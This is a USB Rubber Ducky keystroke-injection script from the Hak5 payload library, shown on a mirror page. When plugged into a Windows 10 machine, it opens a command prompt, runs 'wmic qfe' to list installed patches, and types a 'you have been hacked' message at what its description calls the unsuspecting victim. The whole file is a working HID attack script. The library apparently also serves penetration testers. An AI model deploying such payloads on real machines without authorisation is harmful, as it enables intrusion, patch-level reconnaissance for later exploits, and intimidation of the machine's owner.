Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/Hotfix_Warning/payload.txt
2968 views
1
2
# Title: List Hotfixes and Warning Message
3
# Description: List Hotfixes on a Windows Machine and then prints message of warning to the unsuspecting Victim
4
# Author: John Fawcett
5
# Version: 1.1
6
# Category: General
7
# Target: Windows 10 (CMD)
8
# Attackmodes: HID
9
10
11
#######Stage 1 Open CMD AND Get Hotfixes#########
12
13
REM Open cmd
14
DELAY 2000
15
GUI r
16
DELAY 2000
17
STRING cmd
18
DELAY 500
19
ENTER
20
DELAY 500
21
STRING wmic qfe
22
ENTER
23
24
###### Stage 2 Print Message#######
25
26
DELAY 1000
27
STRING CONGRATULATIONS, YOU HAVE BEEN HACKED!!!!
28
29